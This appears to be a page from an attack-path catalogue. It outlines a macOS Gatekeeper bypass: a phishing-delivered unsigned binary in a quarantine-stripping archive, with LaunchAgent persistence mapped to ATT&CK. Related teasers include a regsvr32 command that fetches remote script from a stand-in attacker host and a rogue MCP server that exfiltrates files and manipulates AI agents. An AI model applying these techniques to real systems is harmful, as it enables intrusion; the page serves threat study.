Gatekeeper bypass → unsigned binary execution
Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.
§ Context
Assumed environment: phishing delivery to macOS user. Payload is a binary inside an archive type (DMG without quarantine, RAR/7z stripping xattrs, ISO) that Gatekeeper doesn't catch on first run.
§ Steps
- 01Build payload binary (unsigned / ad-hoc)ExecutionT1059— Command and Scripting Interpreter
- 02Deliver via phishing / drive-byInitial AccessT1566— Phishing
- 03User runs binary, no promptExecutionT1204— User Execution
- 04Wrap in archive that strips quarantine xattrDefense EvasionMAC-GATEKEEPER-BYPASS— Gatekeeper / Quarantine Bypass
- 05Drop LaunchAgent in ~/LibraryPersistenceMAC-LAUNCHAGENT— LaunchAgent / LaunchDaemon Persistence
§ References
- T1059Command and Scripting Interpreter
- T1566Phishing
- T1204User Execution
§ Frequently asked
- What is the "Gatekeeper bypass → unsigned binary execution" attack path?
- Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts. It chains 5 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Build payload binary (unsigned / ad-hoc) (T1059) — a execution primitive. Assumed environment: phishing delivery to macOS user.
- What is the final impact of this kill-chain?
- The final step lands on Drop LaunchAgent in ~/Library (MAC-LAUNCHAGENT), which falls under Persistence. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- Shared techniques3
Compromised vendor mailbox → reply-chain phishing → client compromise
Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.
- Shared techniques2
Malicious MCP server → silent supply chain for agent tools
User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.
- Shared techniques2
Squiblydoo: regsvr32 → remote SCT execution
regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.
- Shared techniques2
OneNote .one attachment → embedded payload → C2
OneNote .one file with a friendly 'Double-click to view' overlay hides an embedded HTA / VBS / EXE. Effective initial access vector after Microsoft blocked internet macros in 2022.
- Shared techniques2
Header smuggling → gateway sees vendor, mailbox sees attacker
Crafted RFC-edge headers cause SPF/DMARC to validate against one From while Outlook renders the other — slips past Microsoft Defender / Proofpoint and lands as a 'verified' message.
- Shared techniques2
Rowhammer → bit flip → in-browser sandbox escape
JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.